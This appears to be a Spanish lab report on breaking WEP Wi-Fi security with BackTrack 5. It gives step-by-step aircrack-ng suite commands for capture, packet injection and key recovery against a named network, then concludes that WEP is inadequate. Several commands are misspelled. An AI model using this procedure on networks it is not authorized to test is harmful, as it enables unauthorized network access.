SEGURIDAD EN WI-FI CON PROTOCOLOS WEP




OBJETIVO:

Desarrollar habilidades y conocimientos con respecto a la forma de vulnerar el
servicio de seguridad WEP en redes inalámbricas tipo Wi-Fi.


MATERIAL A UTILIZAR:


      CD Backtrack 5 descargables de: http://www.backtrack-
      linux.org/downloads/
      Sistema operativo Linux.


TOPOLOGÍA A UTILIZAR:
PROCEDIMIENTOS PARA ACCEDER A UNA RED

Paso # 1: ingresar Backtrack5-ubuntu

Paso # 2: al ingresar al Backtrack5, nos pide login: root y password: toor
cuando arranque la interfaz ponemos la siguiente línea:



#aeromon-ng (este identifica que tarjeta de red se tiene en el equipo) después
#airodump-ng wlan0 (esta escanea las redes que hay alrededor, wlan0 tarjeta
de red de nuestro equipo).




#Iwconfig wlan0 (muestra los datos de la tarjeta).



# sudo ifconfig wlan0 down (este bajo los servicios de la tarjeta de red)

# sudo Iwconfig wlan0 mode monitor (ponerlo en modo monitor)

# sudo ifconfig wlan0 up (este nos sube los servicios del a tarjeta)

# sudo Iwconfig wlan0
Volvemos al paso a escribir airodump-ng wlan0 para escanear las
redes que hay al nuestro alrededor, en este paso escogemos la red
que vamos a craquear (como muestra la figura a continuación.)

Debemos tener en cuenta los números de:

     BSSID
     CANAL
     ESSID - CLIENTE
#airondump-ng –w otro –c 1 –bssid 20:CF:30:37:9F:A8 wlan0

Estas especificaciones son la de la red que vamos a atacar, es
necesario escribir el bssid en mayúscula.

     Otro (nombre de la carpeta donde va capturando los archivos)
     -c (canal de la red).


      BSSID                 CANAL                  ESSID

 20:CF:30:37:9F:A8           CH 1                45159902



NOTA: en este paso esperamos a que mínimo tenga 30.OOO
paquetes, debajo del DATA.
Ahora abrimos otra consola:



#aireplay-ng -1 0 –a 20:CF:30:37:9F:A8 wlan0

(Trabajamos mientras van cargando los archivos)
Abrimos otra consola



# aireplay-ng -3 -b 20:CF:30:37:9F:A8 wlan0


(Este inyecta el tráfico. Este paso no funciona bien en todos los dispositivos
wifi, dependiendo de los drivers y núcleo de nuestro equipo. Esto nos permitirá
acelerar notablemente el proceso de captura de paquetes).
NOTA: las claves salen en hexadecimal y ASCII



En esta misma consola escribimos



#dir otro.cap (este es el archivo de nosotros con extensión .cap)
nos saldrá la siguiente pagina.



#aircrack-ng otro.cap key found         (esta es la clave del
enrutamiento)
CLAVE: BEBDFF5052B42




Esta es la clave: BEBDFF5052B42 es la de la red que atacamos
45159902, a continuación comprobamos que si es la clave correcta.
CONCLUSION



Con en el laboratorio hemos concluido que la seguridad en las redes inalámbricas es
imprescindible siempre tener la en cuenta, ya que hay muchas transmisiones que no
son seguras, es casi que obligatorio asegúralas para la confiabilidad de los datos
como la integridad y autenticidad de estos mismos. Apresar que WEP está incluido en
la norma de la IEEE no proporciona seguridad total. Uno de los problemas más
latentes en la utilización de vectores al iniciarlo, ya que no tiene cifrado de mensajes
(clave secreta).

El protocolo WEP no debe ser la única herramienta o política para asegura datos o
contraseñas se debe de implementar otras alternativas y mantener controles para la
confiabilidad e integridad de datos y demás.

Backtrack 5

  • 1.
    SEGURIDAD EN WI-FICON PROTOCOLOS WEP OBJETIVO: Desarrollar habilidades y conocimientos con respecto a la forma de vulnerar el servicio de seguridad WEP en redes inalámbricas tipo Wi-Fi. MATERIAL A UTILIZAR: CD Backtrack 5 descargables de: http://www.backtrack- linux.org/downloads/ Sistema operativo Linux. TOPOLOGÍA A UTILIZAR:
  • 2.
    PROCEDIMIENTOS PARA ACCEDERA UNA RED Paso # 1: ingresar Backtrack5-ubuntu Paso # 2: al ingresar al Backtrack5, nos pide login: root y password: toor cuando arranque la interfaz ponemos la siguiente línea: #aeromon-ng (este identifica que tarjeta de red se tiene en el equipo) después
  • 3.
    #airodump-ng wlan0 (estaescanea las redes que hay alrededor, wlan0 tarjeta de red de nuestro equipo). #Iwconfig wlan0 (muestra los datos de la tarjeta). # sudo ifconfig wlan0 down (este bajo los servicios de la tarjeta de red) # sudo Iwconfig wlan0 mode monitor (ponerlo en modo monitor) # sudo ifconfig wlan0 up (este nos sube los servicios del a tarjeta) # sudo Iwconfig wlan0
  • 4.
    Volvemos al pasoa escribir airodump-ng wlan0 para escanear las redes que hay al nuestro alrededor, en este paso escogemos la red que vamos a craquear (como muestra la figura a continuación.) Debemos tener en cuenta los números de: BSSID CANAL ESSID - CLIENTE
  • 5.
    #airondump-ng –w otro–c 1 –bssid 20:CF:30:37:9F:A8 wlan0 Estas especificaciones son la de la red que vamos a atacar, es necesario escribir el bssid en mayúscula. Otro (nombre de la carpeta donde va capturando los archivos) -c (canal de la red). BSSID CANAL ESSID 20:CF:30:37:9F:A8 CH 1 45159902 NOTA: en este paso esperamos a que mínimo tenga 30.OOO paquetes, debajo del DATA.
  • 6.
    Ahora abrimos otraconsola: #aireplay-ng -1 0 –a 20:CF:30:37:9F:A8 wlan0 (Trabajamos mientras van cargando los archivos)
  • 7.
    Abrimos otra consola #aireplay-ng -3 -b 20:CF:30:37:9F:A8 wlan0 (Este inyecta el tráfico. Este paso no funciona bien en todos los dispositivos wifi, dependiendo de los drivers y núcleo de nuestro equipo. Esto nos permitirá acelerar notablemente el proceso de captura de paquetes).
  • 8.
    NOTA: las clavessalen en hexadecimal y ASCII En esta misma consola escribimos #dir otro.cap (este es el archivo de nosotros con extensión .cap) nos saldrá la siguiente pagina. #aircrack-ng otro.cap key found (esta es la clave del enrutamiento)
  • 9.
    CLAVE: BEBDFF5052B42 Esta esla clave: BEBDFF5052B42 es la de la red que atacamos 45159902, a continuación comprobamos que si es la clave correcta.
  • 11.
    CONCLUSION Con en ellaboratorio hemos concluido que la seguridad en las redes inalámbricas es imprescindible siempre tener la en cuenta, ya que hay muchas transmisiones que no son seguras, es casi que obligatorio asegúralas para la confiabilidad de los datos como la integridad y autenticidad de estos mismos. Apresar que WEP está incluido en la norma de la IEEE no proporciona seguridad total. Uno de los problemas más latentes en la utilización de vectores al iniciarlo, ya que no tiene cifrado de mensajes (clave secreta). El protocolo WEP no debe ser la única herramienta o política para asegura datos o contraseñas se debe de implementar otras alternativas y mantener controles para la confiabilidad e integridad de datos y demás.